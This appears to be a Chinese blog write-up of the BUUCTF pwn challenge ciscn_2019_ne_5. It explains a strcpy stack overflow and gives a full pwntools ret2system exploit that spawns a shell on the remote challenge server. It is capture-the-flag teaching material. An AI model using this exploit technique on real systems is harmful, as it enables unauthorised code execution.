【BUUCTF】ciscn_2019_ne_5 Write Up





题目是一道32位程序,依旧是rop

仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节

程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='i386'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',29580)
#io=process('./ciscn_2019_ne_5')
elf=ELF('./ciscn_2019_ne_5')

ra()
sl('administrator')
ra()
sl('1')
ra()
sl('a'*76+p32(elf.plt['system'])+p32(0x80482ea)+p32(0x80482ea))
ra()
sl('4')

io.interactive()

system后面的一个双字是返回地址,这里用不到,直接填的sh的地址,但是要保证每一位都不为零,否则strcpy会断掉

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值